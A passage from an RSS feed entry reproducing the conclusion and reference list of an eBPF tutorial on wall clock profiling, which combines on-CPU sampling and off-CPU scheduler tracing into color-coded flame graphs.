&lt;p&gt;Wall clock profiling with eBPF gives you complete visibility into application performance by combining on-CPU and off-CPU analysis. The on-CPU profiler samples execution to find hot code paths that consume CPU cycles. The off-CPU profiler hooks into the scheduler to measure blocking time and identify I/O bottlenecks or lock contention. Together, they account for every microsecond of wall clock time, showing where your application actually spends its life.&lt;/p&gt;

&lt;p&gt;The tools use eBPF's low-overhead instrumentation to collect this data with minimal impact on the target application. Stack trace capture and aggregation happen in the kernel, avoiding expensive context switches. The user space programs only need to periodically read accumulated results and resolve symbols, making the overhead negligible even for production use.&lt;/p&gt;

&lt;p&gt;By visualizing both types of time in a single flame graph with color coding, you can quickly identify whether problems are computational or blocking in nature. This guides optimization efforts more effectively than traditional profiling approaches that only show one side of the picture. Multi-threaded profiling support reveals parallelism issues and thread-level bottlenecks.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Reference
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;BCC libbpf-tools offcputime: &lt;a href="https://github.com/iovisor/bcc/tree/master/libbpf-tools" rel="noopener noreferrer"&gt;https://github.com/iovisor/bcc/tree/master/libbpf-tools&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;BCC libbpf-tools profile: &lt;a href="https://github.com/iovisor/bcc/tree/master/libbpf-tools" rel="noopener noreferrer"&gt;https://github.com/iovisor/bcc/tree/master/libbpf-tools&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Blazesym symbol resolution: &lt;a href="https://github.com/libbpf/blazesym" rel="noopener noreferrer"&gt;https://github.com/libbpf/blazesym&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;FlameGraph visualization: &lt;a href="https://github.com/brendangregg/FlameGraph" rel="noopener noreferrer"&gt;https://github.com/brendangregg/FlameGraph&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;"Off-CPU Analysis" by Brendan Gregg: &lt;a href="http://www.brendangregg.com/offcpuanalysis.html" rel="noopener noreferrer"&gt;http://www.brendangregg.com/offcpuanalysis.html&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Coz: Finding Code that Counts with Causal Profiling (ASPLOS'15): &lt;a href="https://dl.acm.org/doi/10.1145/2815400.2815409" rel="noopener noreferrer"&gt;https://dl.acm.org/doi/10.1145/2815400.2815409&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;wPerf: Generic Off-CPU Analysis (OSDI'18): &lt;a href="https://www.usenix.org/system/files/osdi18-zhou.pdf" rel="noopener noreferrer"&gt;https://www.usenix.org/system/files/osdi18-zhou.pdf&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Identifying On-/Off-CPU Bottlenecks with Blocked Samples (OSDI'24): &lt;a href="https://www.usenix.org/system/files/osdi24-ahn.pdf" rel="noopener noreferrer"&gt;https://www.usenix.org/system/files/osdi24-ahn.pdf&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;The Flame Graph (CACM'16): &lt;a href="https://queue.acm.org/detail.cfm?id=2927301" rel="noopener noreferrer"&gt;https://queue.acm.org/detail.cfm?id=2927301&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Systems Research is Running out of Time (HotOS'21): &lt;a href="https://sigops.org/s/conferences/hotos/2021/papers/hotos21-s04-najafi.pdf" rel="noopener noreferrer"&gt;https://sigops.org/s/conferences/hotos/2021/papers/hotos21-s04-najafi.pdf&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Time-Sensitive Linux (OSDI'02): &lt;a href="https://www.usenix.org/legacy/event/osdi02/tech/full_papers/goel/goel.pdf" rel="noopener noreferrer"&gt;https://www.usenix.org/legacy/event/osdi02/tech/full_papers/goel/goel.pdf&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Profiling and Tracing Support for Java Applications (ICPE'19): &lt;a href="https://research.spec.org/icpe_proceedings/2019/proceedings/p119.pdf" rel="noopener noreferrer"&gt;https://research.spec.org/icpe_proceedings/2019/proceedings/p119.pdf&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;eBPF Performance Analysis (SIGCOMM'24): &lt;a href="https://www.brendangregg.com/Slides/SIGCOMM2024_eBPF_Performance.pdf" rel="noopener noreferrer"&gt;https://www.brendangregg.com/Slides/SIGCOMM2024_eBPF_Performance.pdf&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;The original link of this article: &lt;a href="https://eunomia.dev/tutorials/32-wallclock-profiler" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/32-wallclock-profiler&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>ebpf</category>
      <category>profiler</category>
      <category>tracing</category>
    </item>
  </channel>
</rss>
